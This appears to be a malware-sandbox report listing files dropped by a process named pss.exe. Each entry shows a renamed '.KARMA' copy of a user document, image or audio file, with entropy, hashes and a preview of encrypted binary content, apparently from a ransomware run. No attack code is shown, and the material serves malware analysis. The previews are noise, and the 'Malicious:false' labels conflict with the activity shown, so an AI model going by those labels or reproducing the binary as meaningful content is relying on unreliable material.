Preview: .C'9.C.G..e).~W"...E..Q.........Q1.Y.O<U...4pR.."jbz.Ty..5.....KARMA.N.G.`...8.s....M.#c+.p..$H.....P..Nv...!.....zC...Z.D.i.....B:.-@.T.c....-.U>.../..l.P.{quV1d.|..;0n.##..M..(..R7I.uG....].A"..WH....z...b...e....M.X.AP.1.[..,.Y..{\...1/....t*o.......(...,j.84c...?.....&7......iP...G.L.|.6....@.y..A..."(.dN...HK..../..8P7K}...5.4..9V...U...{d.%`......E...>p.FNc.......xu.-..h...Lbv.w.Pv.'.1....,.Ugt..=.S,Nl..E02j.......=.rz..;?H.. .}...q{ ..pp..l...W#.}De.,..O i..7......c/....8J...!..+.....`v.nC@.pq~m........H'...<.G.GM..-\...^...Q...#.......j.N.......^...9..J....0.(W..|.u.c..{..&...s.a...0...+.'...".7.}UUk..X.....h=*<....Y.(..,..C...RR....L1....em.........w~....(....]!......~..a.Z...|n!!8.Y$t2..Mf....0.pt..Vq.a.E.....NJ.w..."...../.A 7Hi.iXt.k..&.....G...2"...r..|..:.../C;...g..n.(4M].d.i./\.|..p.%.]a.S..#D.*{..I...M..*...\...8..m..g....C.Ph.......A...`.+y...I?.y.....,.a.p..9.VkQF..."b.........}._gW/..l.w..%:.T...2E6..e....;........0U.L[
C:\Documents and Settings\user\Documents\QCFWYSKMHA\QCFWYSKMHA.docx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.826097880997593
Encrypted:false
SSDEEP:24:iFo6XUSBF3/cxVSghLW88gz3M7JB1F0Foy8JDhw7nxve:ioKfB9crtUBgo1FCoy8Nhw7nxve
MD5:524F8ADD844E798556EF0F6FDB722ED2
SHA1:0CABB31FF8836C7FEBECF8935477D3F0DF6D6FE8
SHA-256:1C056BF12D5A1490A554D5FF010FD6033ABFFBBF1250C965D95018430AC07CFB
SHA-512:F10F899E6B7A8AB3ADAEFE3542DFB42D076B051F8CE4895F2176BEE735A27762E1F72926CF2C9239880A6E598A151581EC8DE855FF52899DE827EC0D9C2B1EB2
Malicious:false
Preview: .?.?.,...x.P. s[]|h...TL.K_.....0..N..........Jv_!.b0G..k.;...KARMA,._..s...H..w..z...N...7*fn.......x.A.Y8<.,....h...Q&@.U_.....?.k.....}N..v....%}.N..U^...7O.,..,H...k._s..'D.f...Tb.g..m..WE?......^.:...C.....4......+.\.a....y..5...'.S/=e...c.....0...C...c.8A.1..3..9.U.8Ttk0;.O.3.4=ey....#.....-..x.',.}...xv..a.. .F6..7.k...i.?*.. )..h..k.Q..9...Q..E........W...*Gi.;...@.y...1.0...c..v.qQ...'$oSg.T.I..O.. ..@..2..^u[a...F......&z..J.^....6....T....^.j..u.O]....r...%..F.$.n.....G.g...~CS. .#Js..s..(..e......~2"K..G..j.]..8.....\.L%..Lc./1...T..r...^EO+.......K.;.v..*.z.)..E...G..j...qn.8*>....N....bMig.u]..iO..p......mT".u%..G.2ip...-.~83..F_.....:$..UC. .h.u.... ..RV.tl`n.{.d...p..a"."...%o._/...."E...........,~!.O(........d]9..$|.U.1..Bah....N.V..yfV\..:..Fsv_i..wq1\.c.. ^..KI.....#.....X$..f..W....&......l.b&...X.&j..Qzsf!*R......Z=...K...<..Q~N0\~W...*,.n.+.."..2#Q...-.y0......k....@....&..$.aa...._.b..N..O..[...].,1...{..~N..dpn...3
C:\Documents and Settings\user\Documents\QCFWYSKMHA\SUAVTZKNFL.xlsx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.812069223185366
Encrypted:false
SSDEEP:24:zJ9u1oTNR/zYAoWzdD7mC9bqJTDr1k5jL/Vo0zx:NAK7zYAveCpqplkl5F
MD5:0849B7EFBBC65E0B9442F3BDAE0F9D97
SHA1:326A3980EA30A540FDE862F1B762B36393CD6A5B
SHA-256:7A0EDF9DAA6A1E252E9C39A29F043DA2884F5DFA69C12A4A915BFE7B8058AAF2
SHA-512:C2872C1F5E2004177845668A4CE726FA9702CB87D663B9E3B8D75E30B363BA5ADC0FC56DE145E21248D24B01F7E2B79EF1B541BF6A379DBCAB4F0F5098C0561E
Malicious:false
Preview: .........a...yK..~.SA.7.(n.......8......^.N...[?e+.7.6..lK.G...KARMA .n<.|.{..y.M.1.....v5a4.(c..(8..!.K.i..Shh....80...Cp?..../...]u9.U]x5.8>...W.:G.V..{.q.7........p...a..?.....xU...lr-..Z6B:;.J.....fv%w.pO..k....P6..K.....(...L...o...e'...@..Hp..%.27...|T.nuQ .I,...n.;......d...'...B~.........xhQ=..0I......Qu..=....@...S ...|//F..|.~.8..X...,..%..UD.....).)R.7y"a.$.I7[u..0DH.Z.Y..N/..j.H...=....w........%....../x~.&......0Pk.KC...7"fg...bMU'....&..1joS...`l.{A.0Q....E[72.'f.M.IW..K..15Qm..^"........0.a.?q+.\9P.......cgd..&.?.V.../f.=....e2S...)6=.z..s.:Hg.4GZ.i.a......S..>f...@Qi.d?.zl~f\j[.k...P..h..K..i..N.@.....x7...R.....c.U..d..d.#..Y>.=.M.J:...6.Rv8...x,...sv.).Mx.S..j.........;V.0...^...L(.Iw..e...R.;.8.r-..k.'.q.wIC.x0=...`...&!.6h..l.o.VF.[..~..$..........JT...M....1.1..D.........D.;N...&...e.a.y7/.QR..R..X.....r.,37.....,...[..*lo.N.G.zY..G.l.B9...;.bp....j.o...#.KR.........X.wEZ..7...R.Gs.q...UE..2..=e....3Z@.....
C:\Documents and Settings\user\Documents\QNCYCDFIJJ.xlsx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.791417124081268
Encrypted:false
SSDEEP:24:AhXV8GitS5U+GeZHs8vRWagm1kU+Pm9kgAbtznU728X9+4ZO0t:Afith+GKM8vRWa7F+AkxZw7N9Ue
MD5:9211F25FDA9480968F25D3A83BB5067C
SHA1:F9DB8957D4C0669835F4CE04B24CA04C2575C9DD
SHA-256:2D46C8A54BD29269C058110D5F3B0843C5BAB836B84050457E93FA222D994B38
SHA-512:CA3A7DD80571441A3204565D66DABD6354540ED4EC3D1A43C7FEB99839905357D6B5D41C0C80CD706E6C2C8302FB6EB65ABE257FBEB79FBED86C693C9C1DD612
Malicious:false
Preview: ....-.:...L....u.j...(.W.51....z2..Lp...?m..w..a;.u..f.]....KARMA..J.#dC.<..._...}.&..^..T.y.[..{..O9.0..XT.Ao..R$.D] h..&......M"...D...R>......-e.A.^.O~.c.4{..a..(Ou2....~k..../.J?c.y...n.-.D9.....q..x...4.r.2p.^..f).2.....id..b..Gv]+a..n..P5^.G...F......OVD.:..s0.0_..jD....R......U...2.9..T ........s...b.._...Up.<..,..g.xK9...cT;C]..f;9.q.*.$.w.b....E.....Q:.b..x.].wk7q...G>^kNfOz.g.G........P.....,.^nq..;z#.dP..Q.......\..X(|..C......>..B<..(MP'`6.9.g<.$z.....9..:LrY........:F.......{......jCa.}m..g`TX...Q=.......0P.........*..Qqc..$!L.(..^*V..\......`..A.%.*.2..p.9}...>.v.f.`<\.\..1|C....q....x.Ki......0?..aW..y...E<GX......Z.._$qW.K.B..x?.,.....P.^vO.d.5.[=..~B.....W]..Q5MT......6.....v..,..kZ.*...\...v.YvrnOg.'Q.B......Ge1......~..6.x..e"l..&Y..Bv......../a...O]..^_;.5.E.j.-.>u.....M4'..........9<...n.._.+F..F.+n!|.....&.:..g.d..!..~L..+B[.A.%W0._..g...-..nY*.gT.B.).g.E..N.R....?ct.6.=........E.5.$..9....>.(.. Kn%....G.s...!.|_....1.J
C:\Documents and Settings\user\Documents\SUAVTZKNFL.png.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.840548231736773
Encrypted:false
SSDEEP:24:CYw5AzY8u4SLZFqQtwWmu4A4ABRWRXY96DKsNi4if1DumiZ/qyksNmTX:3w5WYaSLXqZIxzMXY9BsUhf1wCyksgb
MD5:ED61314F5F0FFB14881AD2FFAE63AD4C
SHA1:351324EA57499EF27DA3CA3A43FB0C4D97937CFA
SHA-256:B50E271005A4E2C436771D1572A3A15C5C01C3277B6DD64415F615AA848E0A0C
SHA-512:DBFBC8A65A26DC84B2B2E90E50465E9A8BA58CB604D172FDA1718E7016896007DF169286C67C51D6764E6539AA407327365694C0582243400BFB6BABA1DA41E2
Malicious:false
Preview: W..>..e'......k}.s..[6.jm.....Z.Z?n_).5....JB.B.\)y..+......KARMA.......V...K...nZB...?.......8C.[.D..TK.)..r...h.o..q.....U"R..HA...?n......I.1.*....... ..i......|.....G.x..iW.!.4...$S./O..}%....E..A.Z2 ..$........Q.l^...JX,......*)!]|....!.....f....|P...@V.?..&.3D.".y...[.3.....D7o...*.'.....A..2....z}.(.....|.w').....(...Pq.......f.)VGq*..~...%.{Fn.@.3).B_N......7..Nr.....q.!....j.......as0.X.=...e.I.B...(.8....M.M.;...,.p...j6"....3.7..=H..E.D.\.n....a.q.../.....G].}.R...c..jM.{\.$..V.*.%[Lz..!..aP....l.Rv9).S....o..."Y...~u..\C....1\..L....Nf......g.A)...~...V..)..x1.'.s.@..v...w..}97ES=...<.35....../.... .ckQ..9..m.^.k....F.V....G=.....`.c.:[.w0.#....x.,.Z7P.......@.......SOB.x......gY.......ke ).}........e........Y.......=..94..#.dx.....,..k...<.{Q.D......3...[T.~....K.,....\..-hz....>#Z..Cvr^.1.......B...(Zrr.#..L.GJ..7......or.I.&.x/=..7y........`..t...........6j.1....U......<W.T..q..H.x;6...U.-g...:...}.....2.5x.....
C:\Documents and Settings\user\Documents\SUAVTZKNFL.xlsx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.828959280386013
Encrypted:false
SSDEEP:24:YxOk/cxqSmLZj9C/e9KL1v+z/kOHtmAHT5bIa0CAHoG2AyWQ1+yISu4P0C:Y4k0sSmp9CFLB7Qt1zSVGGvyWQoyIJ4l
MD5:3D847B9B44072174582F31B1FA411AAE
SHA1:E15CFFDD576583FE0DB29C79FD0E47FAFD5852F0
SHA-256:FB564FB20E6B5D339E2444DB98512E69431BAF1B46AB3647BB937497736769D0
SHA-512:3A17A6A3394E905AA1CD5ED2735F89E66C074E2CDFDA3A81DCE7F528FBBAB5374201374BD001254FDF52CB392F0252A65E5E5D01CEB6FB006F714F89FA3B4416
Malicious:false
Preview: .6N..@..B.~...+4..P,o.p........86....G.........$.al.4m.Z.f....KARMA...W..!..XJ.).;.r..m.{.E.....518.-......B...]6.....^...l.C..m.Y.Y...j..::N..2..}.^..g.....1.....7...Yu&}S........+..y.j..!.H.Y..1U.....cY..E\..b.(.b...x?.<j..]......7.&..o........*..."$..F...\...R).M...?.8........ ..Z...m...t.B...f=....f..=.9kB"?1u.j........N.G6..`=.2......<..-..;......e..<,HwXb7,$|q.0+E.....^.uv.......I..........X....MQuUpP%x.)..f....b.P.Gk.....z.N.w2T.d.2;..&[B.b....9...S..4U.>.~P.*Y..._.d...w_.v.9N..=JC.1.7q..W....=UOA.I..1&.$%Z.2~R..o{..9....]et...^....t...6.R.,....-..d.d..E....\....xq....h8..w...O>..Uvf..Of.\..c.:LH....4]..+..+m5...g..f.)..w.Ii....}..A`....h..NPh..b."B...dJ.....+x<...!o....Yx........=8hfg.O.`..&..n....#/=!s*..?....b.zW.=...+.S...K{.E.w....Kb.y.,>6w.8a..$<S.Yu....ki.A*&.S. {..'w.!...D...{..x..\._m....g...5..0.....h./..,...5...iK|.....yL.c.x9.A.j............b.......%^......|........}Mf..h.......(...Q....=.g.y.G..........n......
C:\Documents and Settings\user\Downloads\BJZFPPWAPT.jpg.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.81860388624575
Encrypted:false
SSDEEP:24:4XQHAyCiR9yuvEysdz/GuHEIQOzprOMwODNR/szl+NzkDNja/dHf:4XQHAynyAsZLHE88Mp/szl+N6M
MD5:12BBF409D907DF02E884729223C52AF1
SHA1:07B005F936504358ECBCA872FB2930270C628506
SHA-256:99597378781A2D85C81D71F447D5F016A6C691D24FAFB77E5692F87F0C38A093
SHA-512:277E94EC6F327F6B348858AB6B70BD979DF250B964300AC33D174DCE7D6650673879701394AF175200824959A3F11E7FAF57B9A1A12802091710CD73F22E6E69
Malicious:false
Preview: ..O|7.......t.-......[..". CU........v..r.d..9.2}B..-..c0.....KARMAqU.n.aX...G.s...b.....e..7....2#.....!.H.u:.vb{..O.E..K.4..g.R.u.9p..~3H..q.c.Qb......s..r.H...y.@y.5.EE...*.j......4.......|J.^W.*...T...._k}.O)......oF$............\.y.>......C`.........2Af.4.'..^.^.. ...@...d..E...3.....z...!Q05q1....i~.av.#.....-.6..$..I-W&'2...R.aKY.I...l.t.!..7rw|[..3.j8.5........[.....k....Y..V..."#...[Z..>.?.....g.R{?....Zr...I.....mt......6.U4F.{.w.]....vz.Z.k...X.=.K...Rw.tF..AT.Z.e..b...X..J......0_`..O.88Z...=.....'&I.w.q...3&..z.*T5.XuP.~ns..BT...=!N.C.\..t.4N.....J........\..s..cj..d....d.<...M.t..F...5...........p...iK.G.&7j....2........y.@.y.UAC1<...SL.1...y.0.8..m...<-..:..$.Z..q.G8DZ..@...[..x.`Fx..95_.'1.R.L..Qz..a{.rd....(..^.....j....7.<P......}.q....>.jz.1P.0..Gt......-.#....O.?1..H:[.MO..w.RZt.d....k.., +.k...n.@yt.X.h.@...;....Y.....\Ca..s.........H!u......s.v..r.c.B.2l.D.#..Rad...P.8.h.Y...gP.s......}B[h.S..n..w!......t./
C:\Documents and Settings\user\Downloads\BJZFPPWAPT.mp3.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.7788102223269595
Encrypted:false
SSDEEP:24:p5NeCU9ZellXhfa0RON16zityxrA9yFzyqdlxqfTk9G6xaBFh8XeQfK:lJUnGbfbQWOu0CWWlxqrk91xKL83i
MD5:0AD8C0A21411886F6A039D6FA22D8B24
SHA1:82D453B2C5D36F597491A80AB25D694C53AD763F
SHA-256:3B45A80C51D699A4D75089D0103CEEC50A60F580EDA60A891F31A5608CEC6C37
SHA-512:FE0E5F969D671C9C24FE6C7863BC35644732077BC135C23DC019A71781CDA7F7CD0D766EEFF86E9F8BEC8B7B8E3DE418367A3DCF18F070DD39E0703CA9853F30
Malicious:false
Preview: Ms]...M.......P...M*....ka.3......"eH.&.....6.K.x........KARMA+.....z.(..",N..{...._.p...\".!.~..Wh....^q.&..Z..S...w.......~..._`.n@....0........C...9.|...#2.%H..+;dOg..r.&.X1....&.....C..]...i...pp.QM...B.e..........|.B.....V.........%...K(.75.r....~.l9n.J.}..F.k........+.$...\..-.<`.Z7H...t~...2\............}Q......pQ'.s.@...|..M.... ..8..0......y.P..#...}..0]3....*..V....>...+..|M...e.....W1s...7jE..#.g.....-.VO`.......8..)....rGR~.M.y3...B.O.3 1......._`D50Ld|...8...^.m.7...yG...u......-...`.@OPbT".d....k1j..;...(^.b..|M.3&].m).M.......y.... ^..g>...-......... .}.ch.......q~k.9-..C@..#.......2..3_+..=....}..BW.......)h...ls.c...\8.._.QO..-...^%g..Ik...D.F.&u|=..1w..>...-.d*........J.....K!.k.......b........... .'T..p.*,...k..c.z)ol.J......=..Y.QKZ.H.^e..D..?/3....>.~.F...J..g.x.....9.NSC#Z.,.............."..l%u..i.].s..[.._!..!..c..`..0A".....g71z?"e..k.q.y.............$... .eX....}.S.S..DS%..d`Zj.z.._.0(...6.k.u...w6.D...o..
C:\Documents and Settings\user\Downloads\BNAGMGSPLO.pdf.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.81284245460368
Encrypted:false
SSDEEP:24:sTNyGquO8mM0PjnFG9nonYyWqwtGGbQzG/QSz9Uom7YMYw:W4uOg0eFqwrn/Qg9q73
MD5:7ABB55513973EEF9C6FE7051FDE2CD72
SHA1:01C7F9ACF20AAA847B8BFD795543E46F113F89C3
SHA-256:AD90946F5CCD84818257FA598A10E2263DD2329E9B792A1018B113A36D29B5DD
SHA-512:FB2A22E857A1F3C6A04F8909B8D311CE73A25FCE798C9CAE6E20B7CA9CAA82D19A6F31F4F108BE4C5CB0AC4DF32F2BE0E9CDFD2FCC33CD94C83DAB6F28261BEE
Malicious:false
Preview: ..H.....}.u,0..g.a.^.HQ.G.b.s.....D..-..s4.].n..Y.K1G........KARMA.........!..^...'.~YN.;.N.........{.P..P4S...G..S.k-..Y.z.b6f.i..>c@.T.@M....)O.)%...f?.3...:*f<...qH..w.`....ULs.L..........l.ZT...<aO=......0.i~.q1ob..._..Z...Xq...(.......k.P4f...&..n....@x.Ld....;..q.YQ%.I.G.^..5`......z.k...,..c.$.O...ti6..Z1.y.Q.....).l.^'@.".....e..H<r.^..D..`._...0...Q.....".....X..#.e.........l.....j.T..{..TG..z.G.$..Pt.li....P...,.......X..?DR........@1o.].|....o..]:.G.|@..V2.H..$.....nQ...2....0.%h"..L..[..aD...t(l...B6V.d.Z.<wc......}.......0V..%d..=E0.....xk.;..`...g.;...X...........J....N.&[Kp6.....n^....6f.P`..Cb.....R..d:.s......Q..ps%....t..0.....D;....u...A>...v;.'...(.XK.l..ye..l....5.E\.U9;H...{TAl..\..H.+.Z,.._.........O.<?_../.......A...+...........I%..=..P.7......*#R..x...3.,Q.P...V.p..I.{.....p/m.x.v@....T......F...rZ..:U_.!T.K.P......nw. .5.......el...'.1.D.Y../.6..e.y.z..{..I...{E.Q.S~...Zpw.<FD"........G.'.aq...K.
C:\Documents and Settings\user\Downloads\BNAGMGSPLO.xlsx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.851850114234256
Encrypted:false
SSDEEP:24:/LrIVgADmvqWN4KBwVYjjtqaM1x7xFPsx0wvdozI8+wa:Trc44KBwVYj5U1RPavGz3g
MD5:0C009BF92371C3E64F9DCEB4EE37C524
SHA1:2A112878005FE01A389D737745FF8D30BF599A3F
SHA-256:E5266C20F1B7410B18FC54924BC80DB588861A5D4FAEDC0D90B4E212E085F8A3
SHA-512:D925AB67B09EDF9966A792C0CE247E9E63CC9305961AB32121611E4AB2782630CC05DCBAF06A18DDFA20F5AEB7789DEC559AD8275A345C3E1FCEE2998F76BDDF
Malicious:false
Preview: ....5.P..[^.MInw.*.sS....pFK...........e..2.]CV...+.-...z...KARMA.*9.EI...9..>..........k.K ..*a.s...hu'.d..G%....|..7.d...g..f,~...w..^69...6.Pl.-S.Z.Hb...(g.Q.^..k4k/R....<..`...={Y.;i....K.7...Z....G..8&.}.&!.m..(...U.K...t.h...Zd..H.....|..vl.2BO....D....NEz..S........eR..z>I..\*.#.....H4:.'~}iT]...%...).....wAM:6B.E.)......sM..3,.f..~U.......$..RM.....X..Y...z^.?..:.......Ab....S.l..f..V8I)...[...:...B..n...HO']....\...I.|..{HsvC@.%Dy....!....2.Z.v.....1J....D.2B...N.........^.T.C'.".X..4.....fG.@.(..T....._...@h..y.5.|......_h3..&.nkv|.......B=....\......J....HT.G.%.....W..Kq...=g.6...@....f.V.f."'..&|.s.I"/P.....&..%....L..e.1..v.u.)*.-..<.w.//:7z.5....c. .X.8......W.g....KE...D.*....f3.,HZ;.J$%...}.3...=v.U7.Eu:..b0..9.M.d..../....T$B6..r..@`..'.....=f`._H.tVS..gR.=../../ih.9..&......c............),.$Ek1.o..T..q..5....%.........:[W"_H.\...9.....dy:........P...a.OJ0..K....6....n...A.3._.93.{p..G|,.../.E..GeG..'r.+..~..3.C
C:\Documents and Settings\user\Downloads\EEGWXUHVUG.jpg.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.840201262589571
Encrypted:false
SSDEEP:24:PTvXies9I0SSgaQqhLUlXvUObKyGDyFw7ljiKs7bgN/Q:7yewrSZaUVvGVDyu7FiKsvC/Q
MD5:7762601B8C810D88740782756F94116E
SHA1:2A6B27A9D790520F7AF9FB7A8B660738671AEBF9
SHA-256:0638FFAB2E85DD8EA7BF3EA4282FF77B0C87A0D8D465A206AA4ACF0C32FBC47C
SHA-512:A3AEC0320FAB2F515F210025EA118CD862473740412A4499CF23DECA0213769BC75D13F3E9F54A475721F591B256069185BBEFC1E2A4E6B0BF4DC42C00E67139
Malicious:false
Preview: W..6.&".=nL.G.3.i..m3.(NN..l....x..!..KP...@.........G.Z.M..B...KARMA_....E.&.].:..q(c.i..S....R..#....<..'.A?'\...;Li..k.l...~........2.w.....&.....].#.q..?.M..|e.....9.....:........1@......V..HN.W.t.?.!E.8W.!].{".?B..wg[.,.k|..a.2.M.-#....*..9.{....+Y.^",A.......vld..:....l? 9...ZAi.~......^..].X..pV....J..R..j...Cl..H..bG.....>".['[.....}I..bo=...3N..)...)........f..)..9..pnX;d\......bjjS....4.%..E.u..S...f.HU..D.A.[Cs.T.#.Xq<h...E...\....i.pRlo0.....A...UHG..$.rY+6...*2=....:`..Y...Ju......\..<.Z..........,.+t.#...{a...].,.7]..J...o..h..^o{...Y...B1...k.(v-.$../P.{....}J?.O_v~iBhGI...T.<...........TNN1.)Q[B......D.h....b}.E*.^...)..~`)c-w...W.'2..5../,H..L.uT...r..@=Ei.v...l;ks.+ ....#;;s...\.....r........../......4.=7.G.P.=?...N..Mq....C.?..B.O.d}..*.01....../b$...ESO.\+...h.E.?..ww..j..}.B......d.S.U.(.>;^..s.o...>.MMxz9.W00...+.6U....ro.!..#..I........2.y..~..v...Q6.C.9.......=.A.+...jT.^.!<....".7.2..?q.*.E.y.1H..e...i...a`..
C:\Documents and Settings\user\Downloads\EFOYFBOLXA.png.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.826497789071994
Encrypted:false
SSDEEP:24:BQXsPHdhz4w4TTe1CtIisksICMmWfyBnSit30I7Qh:e+4TTTe4tIDk9CjWfyBSit34
MD5:93929BA2C827B99CC4EF642DCCE4055E
SHA1:C01C2794B841E3C1DDCF0F6E499280598C9887A5
SHA-256:3D0D7CCD2F69B136D36C3E2A8C2CDADBD3D519D885C3DBA6EF459668A23CA347
SHA-512:809C46F361129210861F394C0C5E0EB806A34EFE4B3F61B3F60E6E8AE0FC52BB94DE25E5EEFFF9BFB30124E81E7021E90AE76A32A855B6A0934EB1F2CD1DC092
Malicious:false
Preview: .....TN..@.2.3....j]........\...AM..3:.S..V.4S.=...1...g...8....KARMA.0..........i.V......v2.Y].z.'.wF$.....\^s..J..V...-.%....]. ..,....T."...^...Wy..3...-.h.....`2H2.0...{.R...s..o..r!../ .?F.y..Q$...7...>.....>y...Z..>....8..}....V...a.3...^RN....c............V$.p...w8...M<.U....GG._C.......K.."..g....1..n?M....../..`.%..YJ...f...!...F.6.t...&.A.D.d.....>&..X..\eZ....."v&....{....7.K.....................TQ@..P..d.LEi.._M".....-.....5..=.J.;.....+...'.....*.r...B.P..O8M..;.JKp....ze.#...s.......Ii.,B.n. ..+.)...n6..4.g.:Z4*....I.....d..W.'..V..........w/.#..5.z.{\.....U}.'^..j..5Q?..g`l5.....QDr...;.W.l..(+.&...i<..`.128..M.P.:."#.7.':+\.nb..,.bt..I../................n.8e.....t.._..!D.[.V?.)6.[.....1..ax"."3..zeyCB.... .[s..+z...%....H.N.<..l.y.G.J..d...S&..[bsb....S..>.D.....;Y..aN...5X)..m.*....$..z....t#...~`"+$.\m..r.4.8i}..u.._...QIO,...L........OH2.j.z.^|......q).@'.,..].......:}n..L...H...d0&%.U.wP.Z..a.3.pP....<{....`.0...v7.v
C:\Documents and Settings\user\Downloads\EOWRVPQCCS.png.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.836894358080607
Encrypted:false
SSDEEP:24:J66iCkPfgTbT+nf6XbAd94/t8nB3Nn2pQpPMucbn:J1Tk3iXbAb0KJRMucb
MD5:7584833BADBE3A0056938470E2B6094E
SHA1:0D168714AB9B8C10B28CA878FC9E9684B6770D71
SHA-256:CEA087A1DEEA14C97D9D9236E430B99DB398A69F57B792386952177A0F84E646
SHA-512:002A2EE47189D7FB14EECCD86E2F69B22C6F20074478A399DCF4A198FC1BD7565D12DCEFC3F5676252A41360B2D03455157CDEE60B2B5181F30CDE7E0F9CD94F
Malicious:false
Preview: U.Q...w.z..j..C.H..x6..sSS....Q....%.............s1.7...O...KARMA..5.6...;....uD.c..p....'K...%.:_.Z7..b..t<EE.<.xf..E.P.qQK.I.EVZ#..!|....iK.3.9."lHZ..@..<..o...n).X.6........]..re...vB/.j..Y.R:..H/.PT..rc....3W.i..Q....{%.vW.+.....j...^..U......f#..7F........SdW..R......j.~....F.......P....J.i1.....'.../Y.Z.~..#..fV.....y.r.n...|..&......4..#B..0z...)l..I......d.......&....&.w...%>.pc_h"...g...H.....?....u`......i...$w.....d2n.4....B.......,K=##. br.........L.p.....Pp.k....Z}...H...pP...8......O...$..[..8[......p.}...y(.L......`.8.w'...%d.....z...a5..=.i+QBV..O.....kd.D..T.`'...6~.N....(....Z.{..5.h.e...U#.<2.6.W.X......_..a$...`VEd^F..b-.t....)<:z.a.G.7.st..W.7..})....~..i:)_Xp...0./%_..>...1..T..sZ.%...m*....t...G..-..o..L..(.eL.......Y|....3.(...5Ul^.-....[.l..Fi.3.6J&(*....e4..'.......L..Gb.t"~~.j1&.`..l......@..?......t.B.v>(c...<..W...`.....2O+..M&wT.:.wp.gh..........E...*8.....'<..../m.P.K..S}.%..iIMDh.b....).Ga....a8.....l....P
C:\Documents and Settings\user\Downloads\EWZCVGNOWT.mp3.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.813700938199611
Encrypted:false
SSDEEP:24:wjjbnBQHKU1oxpkpGUSSo28Nn4S6trwxVVtKO5GQJ108nE8Z/n:mvBQeSr8FI07VtKOwQpd9n
MD5:F75780716C030640E3D69A906F81D02A
SHA1:28AD1E628E486F0847042190520B452C17BE1E28
SHA-256:CA19B44953E34C0D15BB2753CB42D1B19C957A1DCED52FEDCBFB7787C4A69017
SHA-512:87347EA34B43550F1DC5D188DA52C6F9A0976A7052FE7EE7803907A264BB2FF93C7E986E75C654480948F12E8259C59FBBABBA021D68721F1B6128C33A3188A0
Malicious:false
Preview: 1.d.p..g....b.&....Q.XR..P...~..D^.B.........s#.:..).=*.....KARMA.7.'.....J.x.o.%...l.a....m...NA....,.#tW.."... ..+.+...+5..Jc.......p?.-....K5.q...E..K..%.#...'...T?...aMm...qA,7..I*b.E.g.)...Vo.A....[..T..Ym/.[H.vT.t.d._..B..........5..n....<...n.|.Df\..t...>.4....8..?..{Q.M%\.T.....A..X....+j..{..!.%1O.>*.................4......+..(.s&.;+...y.:.lBB.=dN.!V.+.z.._.~.[].....,M.....TP6....v8&V. .x..z[;.:6+.....V.........s.IsR.}.Z}S[V.MW@.........c.-..L.P.....D.TA.3BeI.+."......\.!.U\tq..y8B. .m...1#......n..T%......m.i......1..!f.h.....a.D.5!0.=............\S.a.U6P.Ps...pW.KU.8...k[%lH...Q...H.y0...b.[ucZ... .....&.....m........b.....#....3.._qS.Z!.$Z-.qZ....%....`..3+......4..L9..H.. ...v}.....2.2.=.q.)..9..D.M...g..@..>.6...zw..XQ....p..f.w..........bj.1.fr..dY.......8>]%.nf..n@.Q..9..f.))...^.,.0|..-..3..].......?.......bl..S.s..dp.9..@j5(....V.5@=r{.=...[Y.F..v..w.....I.o..l...l+.c.{....r3&.0..@..T...u..<.....rdfg.ObQ.."..c\....K..ul..!.
C:\Documents and Settings\user\Downloads\GAOBCVIQIJ.docx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.819531832052393
Encrypted:false
SSDEEP:24:qO2f7Q4FCFSFo5nz1oBO0geWj2OSoe9Dep:r2f7QlSOSVgV27oeJep
MD5:4B3A77FD6F64EA2D52A174F2F9234B25
SHA1:1B32EF66ED0A90D319DF97FA3D9122E6DB1127A9
SHA-256:750300689B8EC77436461C628E9CBE0C6562FE93711C88CE71D11ABE1828B308
SHA-512:DDBF8E0E2374EA85324D3A31A1E05AFE635DE0090BFE5F54382178548D33C7FBDA391C6679B665B09E48FF836BC53F3E31B838FCE58C5A59DAAF90B19AE40344
Malicious:false
Preview: .c1.v..H|$..6..Sz].H...U...J.....(z.J;.:.....2h]...@....].-...KARMA.O.N.\.a`5#....*4..E.....".Q..4G.._...C..+.<.....[u..i.7...I_....o.;.....3...]...W..C...p/H....Q.f...K......5..6(PgT.........S..E.J...1...v.~.C...+I%DM.(...\ B.C.M...U..Z."8.^8].....GG7..D..@J.6.2..8v..a..{.......0Z..".'.....l<p0...B_.PfzF.%....~...+c...ch@..6_.....#...H....y....S.V...l.i+V....>@E.. 